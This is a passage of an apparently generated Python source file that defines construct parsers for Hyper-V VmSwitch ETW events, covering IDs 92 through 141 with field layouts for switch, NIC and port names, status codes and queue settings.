"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Direction" / Int32ul,
"Applicability" / Int32ul,
"Type" / Int32ul,
"Action" / Int32ul,
"LocalAddrLen" / Int32ul,
"LocalAddr" / Bytes(lambda this: this.LocalAddrLen),
"LocalPrefix" / Int32ul,
"RemoteAddrLen" / Int32ul,
"RemoteAddr" / Bytes(lambda this: this.RemoteAddrLen),
"RemotePrefix" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=92, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_92_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"PropertyId" / Guid,
"InstanceId" / Guid,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=93, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_93_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"PropertyId" / Guid,
"InstanceId" / Guid,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=94, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_94_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"IPSecOffloadLimit" / Int32ul,
"VMQOffloadWeight" / Int32ul,
"IovOffloadWeight" / Int32ul,
"QueuePairs" / Int32ul,
"InterruptModeration" / Int32ul,
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=95, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_95_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=96, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_96_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=97, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_97_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=98, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_98_0(Etw):
pattern = Struct(
"ExtensionId" / Guid,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=99, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_99_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=100, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_100_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Reservation" / Int64sl,
"Weight" / Int64sl,
"FailReason" / Int32ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=101, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_101_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Reservation" / Int64sl,
"Weight" / Int64sl,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=102, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_102_0(Etw):
pattern = Struct(
"VMNameLen" / Int32ul,
"VMName" / Bytes(lambda this: this.VMNameLen),
"VMIdLen" / Int32ul,
"VMId" / Bytes(lambda this: this.VMIdLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=103, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_103_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"PropertyId" / Guid,
"InstanceId" / Guid,
"UniqueEvent" / Int32ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=104, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_104_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Operation" / Int32ul,
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=105, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_105_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=106, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_106_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"QueueMode" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=107, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_107_0(Etw):
pattern = Struct(
"DataOidTarget" / Int32ul,
"Oid" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=108, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_108_0(Etw):
pattern = Struct(
"DataOidTarget" / Int32ul,
"Oid" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Status" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=109, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_109_0(Etw):
pattern = Struct(
"DataOidTarget" / Int32ul,
"Oid" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"SrcNicNameLen" / Int32ul,
"SrcNicName" / Bytes(lambda this: this.SrcNicNameLen),
"SrcNicFNameLen" / Int32ul,
"SrcNicFName" / Bytes(lambda this: this.SrcNicFNameLen),
"SrcNicIndex" / Int32ul,
"DstNicNameLen" / Int32ul,
"DstNicName" / Bytes(lambda this: this.DstNicNameLen),
"DstNicFNameLen" / Int32ul,
"DstNicFName" / Bytes(lambda this: this.DstNicFNameLen),
"DstNicIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=110, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_110_0(Etw):
pattern = Struct(
"DataOidTarget" / Int32ul,
"Oid" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"SrcNicNameLen" / Int32ul,
"SrcNicName" / Bytes(lambda this: this.SrcNicNameLen),
"SrcNicFNameLen" / Int32ul,
"SrcNicFName" / Bytes(lambda this: this.SrcNicFNameLen),
"SrcNicIndex" / Int32ul,
"DstNicNameLen" / Int32ul,
"DstNicName" / Bytes(lambda this: this.DstNicNameLen),
"DstNicFNameLen" / Int32ul,
"DstNicFName" / Bytes(lambda this: this.DstNicFNameLen),
"DstNicIndex" / Int32ul,
"Status" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=111, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_111_0(Etw):
pattern = Struct(
"StatusTarget" / Int32ul,
"Oid" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=112, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_112_0(Etw):
pattern = Struct(
"StatusTarget" / Int32ul,
"Oid" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"SrcNicNameLen" / Int32ul,
"SrcNicName" / Bytes(lambda this: this.SrcNicNameLen),
"SrcNicFNameLen" / Int32ul,
"SrcNicFName" / Bytes(lambda this: this.SrcNicFNameLen),
"SrcNicIndex" / Int32ul,
"DstNicNameLen" / Int32ul,
"DstNicName" / Bytes(lambda this: this.DstNicNameLen),
"DstNicFNameLen" / Int32ul,
"DstNicFName" / Bytes(lambda this: this.DstNicFNameLen),
"DstNicIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=113, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_113_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=114, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_114_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=115, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_115_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=116, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_116_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"NicIndex" / Int32ul,
"NetCfgInstanceId" / Guid,
"Status" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=117, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_117_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"NicIndex" / Int32ul,
"NetCfgInstanceId" / Guid,
"Status" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=118, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_118_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"ConfigurationType" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=119, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_119_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=120, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_120_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=121, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_121_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=122, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_122_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"QueueMode" / Int32ul,
"Status" / Int32ul,
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=123, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_123_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"LinkSpeed" / Int64ul,
"VmqSupported" / Int8ul,
"dynamicVmqSupported" / Int8ul,
"QueueMode" / Int32ul,
"EnabledFilterTypes" / Int32ul,
"EnabledQueueTypes" / Int32ul,
"SupportedQueueProperties" / Int32ul,
"SupportedFilterTests" / Int32ul,
"SupportedHeaders" / Int32ul,
"SupportedMacHeaderFields" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=124, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_124_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=125, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_125_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=126, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_126_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=127, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_127_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=128, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_128_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"FailReason" / Int32ul,
"Ext1" / Int32ul,
"Ext2" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=129, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_129_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"FailReason" / Int32ul,
"RoutingDomainGuidLen" / Int32ul,
"RoutingDomainGuid" / Bytes(lambda this: this.RoutingDomainGuidLen),
"RoutingDomainNameLen" / Int32ul,
"RoutingDomainName" / Bytes(lambda this: this.RoutingDomainNameLen),
"Ext1" / Int32ul,
"Ext2" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=130, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_130_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Direction" / Int32ul,
"Action" / Int32ul,
"LocalIPAddrLen" / Int32ul,
"LocalIPAddr" / Bytes(lambda this: this.LocalIPAddrLen),
"RemoteIPAddrLen" / Int32ul,
"RemoteIPAddr" / Bytes(lambda this: this.RemoteIPAddrLen),
"LocalPortLen" / Int32ul,
"LocalPort" / Bytes(lambda this: this.LocalPortLen),
"RemotePortLen" / Int32ul,
"RemotePort" / Bytes(lambda this: this.RemotePortLen),
"Protocol" / Int32ul,
"Weight" / Int32ul,
"Stateful" / Int8ul,
"IdleSessionTimeout" / Int32ul,
"VirtualSubnetId" / Int32ul,
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=131, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_131_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Direction" / Int32ul,
"Weight" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=132, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_132_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=133, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_133_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"ProcIndex" / Int32ul,
"VmqIndex" / Int32ul,
"RssQueueIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=134, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_134_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"ProcIndex" / Int32ul,
"VmqIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=135, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_135_0(Etw):
pattern = Struct(
"ProcIndex" / Int32ul,
"ProcUtil" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=136, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_136_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"VmqIndex" / Int32ul,
"RssQueueIndex" / Int32ul,
"ProcIndex" / Int32ul,
"QueueLoad" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=137, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_137_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"VmqIndex" / Int32ul,
"RssQueueIndex" / Int32ul,
"ProcIndex" / Int32ul,
"QueueLoad" / Int32ul,
"SafeThreshold" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=138, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_138_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"VmqIndex" / Int32ul,
"ProcIndex" / Int32ul,
"QueueLoad" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=139, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_139_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"VmqIndex" / Int32ul,
"ProcIndex" / Int32ul,
"QueueLoad" / Int32ul,
"SafeThreshold" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=140, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_140_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"VmqIndex" / Int32ul,
"RssQueueIndex" / Int32ul,
"ReceiveProcIndex" / Int32ul,
"SendProcIndex" / Int32ul,
"DestinationReceiveProcIndex" / Int32ul,
"DestinationSendProcIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=141, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_141_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"IsActivate" / Int32ul,
"VmqIndex" / Int32ul,
"ProcIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=142, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_142_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
